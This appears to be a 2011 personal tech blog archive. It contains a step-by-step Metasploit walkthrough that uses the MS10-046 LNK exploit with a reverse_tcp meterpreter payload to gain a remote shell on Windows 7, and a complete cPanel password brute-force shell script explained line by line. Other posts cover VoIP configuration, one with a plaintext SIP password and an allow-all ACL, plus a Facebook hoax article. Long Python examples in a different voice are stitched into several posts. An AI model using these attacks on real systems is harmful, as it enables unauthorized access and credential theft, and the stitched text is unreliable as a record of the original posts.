METASPLOIT: Hacking windows 7 exploit December 17, 2011
Posted by hasnain110 in Uncategorized.
Hey guys. I will be giving a quick and dirty how-to of exploiting a Windows vulnerability to log in to a remote system without a username and password using Metasploit.
Requirements:
1. Metasploit installed (preferably on BackTrack)
2. Ruby installed (install all the Ruby packages to avoid any issues)
3. Two operating systems, running either as virtual machines on the same host or on physically separate machines
4. The target host must not be running any antivirus (AV)
Here are the quick steps.
SCENARIO:
Machine 1: Host Linux Machine
Machine 2: Target Windows 7 Machine
Step 1:
Download and install the Metasploit Framework source code on Machine 1. I prefer downloading from SVN. Run the command below on the CLI:
svn co https://www.metasploit.com/svn/framework3/trunk/
OR
Download directly from here: http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
Step 2:
Locate the file msfconsole. In my case it was under /opt/framework-x.x.x/app.
Run it with: ruby msfconsole
Step 3:
Now once you get the msf> prompt, type the command below:
search LNK
and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Step 4:
Now that we have found the desired module, we will use this exploit by typing the command below:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Once loaded, your msf prompt should include the name of the loaded exploit. The image is given below.
Step 5:
Now that the exploit is loaded, we will set the payload for the exploit selected above. In our scenario we will be using a reverse TCP payload. Type the command below to set the payload:
set payload windows/meterpreter/reverse_tcp
Step 6:
Now it's time to do some configuration for the exploit/payload that we have just set. Type the following command:
show options
You should get the default output shown below.
Step 7:
Now we have to set the local host to listen on. Type the two commands given below:
set SRVHOST x.x.x.x (this will be the IP address of your host running Metasploit)
Then run
set LHOST x.x.x.x (this will also be the IP address of your host running Metasploit)
Step 8:
Now check that the configuration above has been applied.
Step 9:
Now finally we will start the exploit. Run the command exploit
Once executed we should see “Server Started” (make sure that your server is not running any web service on port 80).
Seems like all is OK so far.
Step 10:
On any client machine, simply open Internet Explorer and try to open http://x.x.x.x (the IP of the Metasploit server).
Note: it will give you a pop-up asking for permission; click ALLOW.
Make sure you do not have any antivirus running on the target PC.
Step 11:
Once the connection is established you should see something like below.
Step 12:
You can check the number of successfully connected sessions by running the command sessions in the msf console.
Step 13:
Now that we can see we have one victim connected, it's time to log in to the system. Run the command sessions -i 1
Once connected, type Linux commands to browse inside the system. Enjoy!
Final Step:
This documentation is purely for educational purposes. Using it ethically or maliciously is your individual act.
Use it responsibly. Comment if you like the post.
Ending note: I cannot explain the details of each step due to lack of time.
Run Android on Laptop/Netbook November 18, 2011
Posted by hasnain110 in Uncategorized.
Hey... Ever wonder whether you can actually run Android on your laptop? Yes, it is possible.
You will need a USB flash drive with at least 256 MB of storage, and make sure all the data on it is deleted.
To make it easier, I will explain it step by step.
Step 1:
Get any USB flash drive with at least 256 MB of empty storage.
Step 2:
Download the Android .iso from
Step 3:
Once step 2 is done, download the UNetbootin software from and install/run it.
Step 4:
Now run UNetbootin, click the radio button beside Diskimage, then click the “...” button and select the Android ISO file you just downloaded. Finally, select the correct flash drive or memory card in the menu at the bottom, and click OK.

The software will extract and copy the files onto your USB drive, making it bootable.
Step 5:
Once the files are extracted, the software will ask you to reboot the system. Restart the system and make sure it is configured to boot from USB.
Conclusion
Enjoy the power of a super-fast mobile OS running on a laptop. Although it is not too stable, it is still worth trying. You do not need to worry about messing up your existing system settings, as it runs directly from the USB drive. Someday it will surely replace live distros!
If you find this post helpful and easy, please do comment.
How to use HTC Mobile GPS on PC/Google Earth June 25, 2011
Posted by hasnain110 in Uncategorized.
Hey fellows,
Finally, after spending many days exploring how to use my HTC Wildfire GPS on my laptop, I have figured out how to get it done. On the internet there is a load of information on getting it done, but I found it really poor, as the steps are a little complicated, so I'm writing this easy how-to.
In this guide you will learn how to use your Android phone as a standalone GPS for Google Earth on a PC.
Note: your phone and computer must have Bluetooth.
1. Download and install Google Earth on your PC.
2. Download GooPsPro2_5_3Beta.exe (thanks to developer Dave for the compatibility code change).
3. Download and install BlueNMEA from the Android Market.
Setup:
1. Install the BlueNMEA software onto your Android from this link (http://max.kellermann.name/download/blue-nmea/BlueNMEA-2.1.2.apk). Once installed, run it without making any changes in the software. Make sure the GPS option is selected and the TCP status shows listening on port XYZ (if it shows already listening, soft-reboot your HTC and try again).
2. Once installed, pair your HTC with your laptop. While pairing you will see a popup balloon in the system tray showing that Windows is trying to download and install some updates/drivers; let Windows finish its job.
3. Once pairing is done, go to the Bluetooth settings on your laptop, click on the second tab, COM PORTS, and make sure an outgoing port has already been created for BLUENMEA by Windows while the system performed step 2.
4. Start the GooPs program you downloaded earlier. Go to Options and select the COM port you saw associated with the BlueNMEA software. Uncheck Autoconnect, Autoscan and Compress.
5. Now press Connect in the GooPs program. Google Earth should open and GooPs will say opening COM"#" (# being the number you selected).
6. On your phone open BlueNMEA; your Bluetooth PC should be listed, select it. If all went well it will establish a connection and you will then have GPS on your PC. If it doesn't connect, trying again often fixes it. If not, something else is wrong.
It worked great for me. Leave your comments if you have any confusion and I will try my best to reply ASAP.
BruteForce tool using linux shell script June 17, 2011
Posted by hasnain110 in Uncategorized.
Hello, did you ever try to brute-force a website login page and not find the right tool?
It always happens, so I will explain how I did it with a Linux shell script.
I wrote a small script to brute force cPanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any responsibility for what you do with this tool
# Hopefully it will make your life easier rather than making other
# people's lives more difficult!
#############################
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
#############################
echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site
n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do
    password=`sed -n "$i"p pass_list`
    b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
    echo trying password $password
    if [ ! -z "$b" ]; then
        echo "Bengo WebSite "$site" password is: "$password""
        echo "Have Fun
"
        exit 0
    fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================
Let's explain what we did:
#!/usr/bin/env bash
to execute the script using the bash shell found through the environment via "env".
read site
sets the user input as the variable "$site", which will be the website domain name.
n=`cat pass_list | wc -l`
this counts how many lines the file "pass_list", which contains the password list, has.
for (( i=1; i <= $n; i++));
we put the number we got in the variable "$n" into a for loop, so for example if the file pass_list has 1000 passwords in it, we will run the for loop 1000 times to try all the passwords.
password=`sed -n "$i"p pass_list`
here we use "sed", the stream editor, with option "p" to print the line of pass_list whose number matches the loop counter on each iteration.
For example, in loop number 4 the variable $i will have the value 4 and the sed command will look like this:
"sed -n 4p pass_list", which will print the 4th line from the password file pass_list.
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx", the Linux command-line browser, as the HTTP client that connects to the target website.
We use option "-dump" to dump the output instead of waiting for user action, "-nolist" to disable the link list in dumps, and "-auth=" to set the authorization ID and password for protected documents.
For example, to access the cPanel account for the website "example.com" with username "user" and password "pass", it would look like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"
so the password file pass_list should contain usernames and passwords in this format: "username:password"
if [ ! -z "$b" ]; then
here we use an if statement with the test "! -z", which means that if the value of "$b" is not empty (not zero length), we are logged in, the password is the value of the variable "$password" in the current loop iteration, and we exit successfully; otherwise we continue the loop.
Note: You will need your own password dictionary file to make it work
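The script above sends one basic-auth attempt per password to the cPanel port, which leaves a distinctive trail on the server side: a run of 401 responses from one source address in a short window, often with several different usernames. The following is an added example, not part of the post or of the Dr.Death script, showing detection logic run over constructed cPanel-style access-log lines. It assumes the Apache combined log format (on a 401 Apache records the username the client attempted in the user field); the log lines, IP addresses, usernames, user-agent string, threshold and window are all constructed for the demonstration.

```python
"""Flag sources that generate repeated HTTP 401s against a cPanel login port.

Added example (not the post's or Dr.Death's code). Assumes Apache-style
combined log lines; every value below is constructed for the demonstration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one source (203.0.113.7) guessing several accounts
# with a text-mode client, and one legitimate user (198.51.100.23) who
# mistypes a password once and then logs in.
SAMPLE_LOG = """\
203.0.113.7 - root [17/Jun/2011:10:00:01 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
203.0.113.7 - root [17/Jun/2011:10:00:02 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
198.51.100.23 - alice [17/Jun/2011:10:00:03 +0000] "GET / HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - admin [17/Jun/2011:10:00:03 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
203.0.113.7 - admin [17/Jun/2011:10:00:04 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
203.0.113.7 - cpanel [17/Jun/2011:10:00:05 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
203.0.113.7 - cpanel [17/Jun/2011:10:00:06 +0000] "GET / HTTP/1.0" 401 381 "-" "Lynx/2.8.7rel.1"
198.51.100.23 - alice [17/Jun/2011:10:00:15 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [timestamp], "request",
# status, size, and optionally "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: info} for every source with >= threshold 401 responses
    inside a sliding window of window_seconds. info carries the time the
    threshold was first crossed, the total failures and the usernames tried."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)      # ip -> timestamps of 401s inside the window
    failures = defaultdict(int)      # ip -> total 401s seen
    usernames = defaultdict(set)     # ip -> distinct usernames attempted
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != 401:
            continue
        ip, ts = rec["ip"], rec["ts"]
        failures[ip] += 1
        if rec["user"] != "-":
            usernames[ip].add(rec["user"])
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = {"first_alert": ts}
    for ip, info in alerts.items():
        info["failures"] = failures[ip]
        info["usernames"] = sorted(usernames[ip])
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed logins, users tried "
              f"{info['usernames']}, threshold crossed at {info['first_alert']:%H:%M:%S}")
```

The guessing source crosses the threshold on its fifth 401 at 10:00:05 and is reported with all three usernames it tried, while the legitimate user with a single failure is not flagged. Raising the threshold or shortening the window trades sensitivity for fewer false positives; a second signal worth adding in practice is the number of distinct usernames per source, which is high for a list in "username:password" form and normally one for a real user.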
FreeSWITCH step-by-step how-to February 3, 2011
Posted by hasnain110 in Uncategorized.
Step 1:
Edit vars.xml; it should look like this:
<!-- Internal SIP Profile -->
<X-PRE-PROCESS cmd="set" data="internal_auth_calls=true"/>
<X-PRE-PROCESS cmd="set" data="internal_sip_port=5080"/>
<X-PRE-PROCESS cmd="set" data="internal_tls_port=5081"/>
<X-PRE-PROCESS cmd="set" data="internal_ssl_enable=false"/>
<X-PRE-PROCESS cmd="set" data="internal_ssl_dir=$${base_dir}/conf/ssl"/>
<!-- External SIP Profile -->
<X-PRE-PROCESS cmd="set" data="external_auth_calls=false"/>
<X-PRE-PROCESS cmd="set" data="external_sip_port=5060"/>
<X-PRE-PROCESS cmd="set" data="external_tls_port=5061"/>
<X-PRE-PROCESS cmd="set" data="external_ssl_enable=false"/>
<X-PRE-PROCESS cmd="set" data="external_ssl_dir=$${base_dir}/conf/ssl"/>
and
<X-PRE-PROCESS cmd="set" data="global_codec_prefs=G729,G723,G711U"/>
<X-PRE-PROCESS cmd="set" data="outbound_codec_prefs=G729,G723,G711U"/>
Step 2:
All termination gateways will now be added under /usr/local/freeswitch/conf/sip_profiles/external.
Create gw.xml; it should look like this:
<include>
<gateway name="broadvoice1">
<param name="username" value="4234685032"/>
<param name="realm" value="4234685032"/>
<param name="from-domain" value="174.136.52.143"/>
<param name="password" value="sipsip"/>
<param name="extension" value="5555551234"/>
<param name="proxy" value="174.136.52.143"/> <!-- example using the broadvoice DNS SRV record for New York City. -->
<param name="expire-seconds" value="3600"/>
<param name="register" value="false"/>
<param name="retry-seconds" value="6"/>
</gateway>
</include>
Step 3:
Now create an ingress gateway.
Go to /usr/local/freeswitch/conf/autoload_configs and edit acl.conf.xml:
vi acl.conf.xml and add this at the bottom:
<list name="asterisk_box" default="allow">
<node type="allow" cidr="216.218.233.194/32"/>
</list>
Now we have to apply this ACL in /usr/local/freeswitch/conf/sip_profiles/internal.xml:
vi internal.xml
Add this line at the bottom:
<param name="apply-inbound-acl" value="asterisk_box"/>
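The list above is declared with default="allow" and contains only an allow node, so it admits every source address, not just the Asterisk box; a list that lets only the Asterisk box through needs default="deny". As an added example (not FreeSWITCH code and not part of the post), the following Python models how such a list is evaluated and compares the post's list with a deny-by-default variant and with a constructed mixed list. The evaluation rule used here (the list default applies unless a node's CIDR contains the address; with several matching nodes the longest prefix wins and, on equal prefix length, the later node) is my reading of FreeSWITCH's ACL evaluation and should be treated as an assumption; the unknown source addresses and the mixed list are constructed.

```python
"""Model the decision a FreeSWITCH-style <list> makes for an inbound source.

Added example, not FreeSWITCH's own code. The matching rule (default unless a
node contains the address; longest prefix wins, later node wins ties) is an
assumption about FreeSWITCH behaviour; the sample addresses are constructed.
"""
import ipaddress
import xml.etree.ElementTree as ET

# The list exactly as the post adds it to acl.conf.xml.
ACL_FROM_POST = """
<list name="asterisk_box" default="allow">
  <node type="allow" cidr="216.218.233.194/32"/>
</list>
"""

# Same node, but the list denies everything it does not explicitly allow.
ACL_DENY_DEFAULT = """
<list name="asterisk_box" default="deny">
  <node type="allow" cidr="216.218.233.194/32"/>
</list>
"""

# Constructed list showing the specificity rule: a /24 deny carved out of a /8 allow.
ACL_MIXED = """
<list name="lan_except_guests" default="deny">
  <node type="allow" cidr="10.0.0.0/8"/>
  <node type="deny" cidr="10.0.5.0/24"/>
</list>
"""


def parse_acl(xml_text):
    """Read a <list> element into a dict of name, default and (type, network) nodes."""
    root = ET.fromstring(xml_text)
    if root.tag != "list" or root.get("default") not in ("allow", "deny"):
        raise ValueError("expected <list default=\"allow|deny\">")
    nodes = []
    for node in root.findall("node"):
        if node.get("type") not in ("allow", "deny"):
            raise ValueError("node type must be allow or deny")
        nodes.append((node.get("type"), ipaddress.ip_network(node.get("cidr"), strict=False)))
    return {"name": root.get("name"), "default": root.get("default"), "nodes": nodes}


def acl_permits(acl, ip_text):
    """True if the list admits ip_text under the assumed rule."""
    ip = ipaddress.ip_address(ip_text)
    verdict, best_bits = acl["default"], -1
    for node_type, network in acl["nodes"]:
        # A more specific (or equally specific, later) matching node overrides.
        if ip in network and network.prefixlen >= best_bits:
            verdict, best_bits = node_type, network.prefixlen
    return verdict == "allow"


def evaluate(xml_text, sources):
    """Map each source address to the list's allow/deny decision."""
    acl = parse_acl(xml_text)
    return {src: acl_permits(acl, src) for src in sources}


# Constructed sources: the Asterisk box from the post and two strangers.
SOURCES = ["216.218.233.194", "203.0.113.9", "198.51.100.77"]

if __name__ == "__main__":
    for label, xml_text in (("post", ACL_FROM_POST), ("deny-default", ACL_DENY_DEFAULT)):
        print(label, evaluate(xml_text, SOURCES))
```

With the post's list every source is admitted, so `apply-inbound-acl` is doing no filtering; with default="deny" only 216.218.233.194 gets through. The mixed list shows why the longest-prefix rule matters: 10.0.1.1 is allowed by the /8 while 10.0.5.7 is denied by the more specific /24, regardless of which node comes first.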
Step 4:
Now create a dialplan.
Go to /usr/local/freeswitch/conf/dialplan
vi public.xml
<extension name="outbound_international">
<condition field="destination_number" expression="7243(\d+)$">
<!--<action application="set" data="absolute_codec_string=G729"/>-->
<action application="bridge" data="{absolute_codec_string='G729'}sofia/gateway/broadvoice1/7243$1"/>
</condition>
</extension>
Step 5:
Now start FreeSWITCH and make the calls.
Asterisk Video Support January 23, 2011
Posted by hasnain110 in Uncategorized.
In order to enable video in Asterisk, modify sip.conf to add:
[general]
videosupport=yes
It is also better to add the video codecs to the extensions if the video call is from extension to extension.
For example:
[video2]
type=friend
username=video2
secret=hidden
host=dynamic
context=from-camera
callerid=Video 2 <1222>
canreinvite=no
disallow=all ; Windows Messenger will choose wrong codecs if you allow=all
allow=ulaw
allow=alaw
allow=speex
allow=gsm
allow=h261
allow=h263
allow=h263p
Enjoy the video call!
FACEBOOK WILL END ON MARCH 15th! January 9, 2011
Posted by hasnain110 in Uncategorized.
HOAX of the Year 2011
PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March. Managing the site has become too stressful.
“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”
Zuckerberg went on to explain that starting March 15th, users will no longer be able to access their Facebook accounts.
“After March 15th the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back once Facebook goes out of business.”
Zuckerberg said that the decision to shut down Facebook was difficult, but that he does not think people will be upset.
“I personally don’t think it’s a big deal,” he said in a private phone interview. “And to be honest, I think it’s for the better. Without Facebook, people will have to go outside and make real friends. That’s always a good thing.”
Some Facebook users were furious upon hearing the shocking news.
“What am I going to do without Facebook?” said Denise Bradshaw, a high school student from Indiana. “My life revolves around it. I’m on Facebook at least 10 hours a day. Now what am I going to do with all that free time?”
However, parents across the country have been experiencing a long anticipated sense of relief.
“I’m glad the Facebook nightmare is over,” said Jon Guttari, a single parent from Detroit. “Now my teenager’s face won’t be glued to a computer screen all day. Maybe I can even have a conversation with her.”
Those in the financial circuit are criticizing Zuckerberg for walking away from a multibillion dollar franchise. Facebook is currently ranked as one of the wealthiest businesses in the world, with economists estimating its value at around 7.9 billion.
But Zuckerberg remains unruffled by these accusations. He says he will stand by his decision to give Facebook the axe.
“I don’t care about the money,” said Zuckerberg. “I just want my old life back.”
The Facebook Corporation suggests that users remove all of their personal information from the website before March 15th. After that date, all photos, notes, links, and videos will be permanently erased.
Taken from HERE
What is Audio Mining .. ? January 6, 2011
Posted by hasnain110 in Uncategorized.
Audio mining approaches
There are two main approaches to audio mining.
Text-based indexing. Text-based indexing, also known as large-vocabulary continuous speech recognition (LVCSR), converts speech to text and then identifies words in a dictionary that can contain up to several hundred thousand entries. If a word or name is not in the dictionary, the LVCSR system will choose the most similar word it can find.
The system uses language understanding to create a confidence level for its findings. For findings with less than a 100 percent confidence level, the system offers other possible word matches, said Professor Dan Ellis, who leads Columbia University’s Laboratory for Recognition and Organization of Speech and Audio (http://labrosa.ee.columbia.edu).
Thus, an LVCSR system can enhance its accuracy level by storing words that sound much like other words, although this approach also generates some wrong results.
Phoneme-based indexing. Phoneme-based indexing doesn’t convert speech to text but instead works only with sounds.
The system first analyzes and identifies sounds in a piece of audio content to create a phonetic-based index. It then uses a dictionary of several dozen phonemes to convert a user’s search term to the correct phoneme string. (Phonemes are the smallest unit of speech that distinguishes one utterance from another. For example, "ai", "eigh", and "ey" are the long "a" phoneme. Each language has a finite set of phonemes, and all words are sets of phonemes.) Finally, the system looks for the search terms in the index.
"A phonetic system requires a more proprietary search tool because it must phoneticize the query term, then try to match it with the existing phonetic-string output," Weideman said. This is considerably more complex than using one of the many existing text-based search tools.
Phoneme-based searches can result in more false matches than the text-based approach, particularly for short search terms, because many words sound alike or sound like parts of other words. For example, Weideman explained, a search for the word "ray" might get a match from within the word "trading."
According to Ellis, it’s difficult for a phonetic system to accurately classify a phoneme except by recognizing the entire word that it is part of or by understanding that a language permits only certain phoneme sequences.
However, he added, phonetic indexing can still be useful if the analyzed material contains important words that are likely to be missing from a text system’s dictionary, such as foreign terms and names of people and places.
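To make the false-match problem concrete, here is an added example (not from the article or from any product it names) built around a toy phoneme index. The phoneme strings are constructed ARPAbet-style approximations, not recognizer output, and the transcript is made up. It shows that a sound-alike search for "ray" hits inside "trading" and "array", and that requiring the match to line up with word boundaries, in the spirit of Ellis's remark, removes those hits at the cost of missing inflected forms such as "trading" for a query of "trade".

```python
"""Toy phoneme-based index and search, illustrating sound-alike false matches.

Added example. The phoneme sequences are constructed approximations in an
ARPAbet-like notation and the transcript is invented for the demonstration.
"""

# Constructed phonetic dictionary: word -> phoneme sequence.
PHONEME_DICT = {
    "ray":     ["R", "EY"],
    "trading": ["T", "R", "EY", "D", "IH", "NG"],
    "trade":   ["T", "R", "EY", "D"],
    "array":   ["AH", "R", "EY"],
    "market":  ["M", "AA", "R", "K", "AH", "T"],
    "today":   ["T", "AH", "D", "EY"],
    "the":     ["DH", "AH"],
    "bought":  ["B", "AO", "T"],
    "an":      ["AE", "N"],
}

# Constructed "recognized" word stream standing in for a piece of audio.
TRANSCRIPT = ["trading", "today", "the", "market", "ray", "bought", "an", "array"]


def phoneticize(term):
    """Convert a one- or multi-word query to its phoneme sequence."""
    phones = []
    for word in term.lower().split():
        if word not in PHONEME_DICT:
            raise KeyError(f"no phonetic form for {word!r}")
        phones.extend(PHONEME_DICT[word])
    return phones


def build_index(words):
    """Lay the words out as one phoneme stream, remembering each word's span."""
    stream, spans = [], []
    for word in words:
        phones = phoneticize(word)
        spans.append((word, len(stream), len(stream) + len(phones)))
        stream.extend(phones)
    return {"stream": stream, "spans": spans}


def phonetic_search(index, term, whole_word=False):
    """Return (covering_words, offset) for each place the query's phonemes occur.

    With whole_word=False the match may start or end inside a word, which is
    what produces "ray" inside "trading". With whole_word=True the match must
    begin at a word start and end at a word end."""
    query = phoneticize(term)
    stream, spans = index["stream"], index["spans"]
    starts = {s for _, s, _ in spans}
    ends = {e for _, _, e in spans}
    hits = []
    for i in range(len(stream) - len(query) + 1):
        if stream[i:i + len(query)] != query:
            continue
        j = i + len(query)
        if whole_word and (i not in starts or j not in ends):
            continue
        covering = " ".join(w for w, s, e in spans if s < j and e > i)
        hits.append((covering, i))
    return hits


if __name__ == "__main__":
    idx = build_index(TRANSCRIPT)
    print("sound-alike:", phonetic_search(idx, "ray"))
    print("whole-word: ", phonetic_search(idx, "ray", whole_word=True))
```

The sound-alike search for a two-phoneme query returns three hits, two of them inside longer words, which is the short-term false-match effect the article describes. The whole-word variant returns only "ray", but the same constraint makes "trade" miss "trading", so a real system would need a middle path such as morphological variants or word-level confidence rather than a hard boundary rule.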
How the technology works
Text- and phoneme-based systems operate in much the same way, except that the former uses a text-based dictionary and the latter uses a phonetic dictionary.
The most important and complex component technology for audio mining is speech recognition. In these systems, explained University of Texas Assistant Professor Latifur R. Khan, "A speech recognizer converts the observed acoustic signal into the corresponding [written] representation of the spoken [words]."
Speech recognition software contains acoustic models of the way in which all phonemes are represented. Also, TMA’s Meisel said, there is a statistical language model that indicates how likely words are to follow each other in a specific language. By using these capabilities, as well as complex probability analysis, the technology can take a speech signal of unknown content and convert it to a series of words from the program’s dictionary.
Khan noted that this process is more difficult with highly inflected languages, such as Chinese, in which tonality changes the meaning of a word.
Some audio mining dictionaries are domain specific, for use by professionals in different fields, such as law or medicine. In any event, users can update dictionaries, usually manually but sometimes automatically by scanning Web sites or other sources into an audio mining product.
Some products, such as ScanSoft’s AudioMining Development System, use XML’s ability to tag data so that it can be read by other XML-capable systems, ScanSoft’s Weideman noted. This lets the product export speech index information to other systems, he said.
Performance
By working with powerful host-system processors, large memories, and efficient algorithms, most audio mining technology provides high performance levels.
For example, Fast-Talk says its newest technology can index a one-hour audio file in five minutes, and can process 30 hours of content per second in response to a specific, 10-phoneme search query in a host system running a 2.53-GHz Pentium CPU.
Note: this information is taken from here.
BlackBerry VoIP/SIP softphone is finally available January 4, 2011
Posted by hasnain110 in Uncategorized.
BlackVoib is a generic SIP client for GSM BlackBerry devices. It allows the user to make and receive SIP calls over the internet via WiFi or OTA, through a SIP service provider or a SIP server run by the user.

Features
1. User controls all SIP account settings.
2. Supports more recent BlackBerry GSM phones only.
3. Supports G.711 ulaw and alaw codecs.
4. DTMF passthru via SIP INFO.
5. Speaker Phone and Handset can be toggled.
6. Volume Controls.
7. BlackBerry phone book integration.
8. Supports separate authentication ID.
9. Can contact server with a different port other than the default 5060.
10. Can use a different port other than the default 5060 as local port.
Download: click here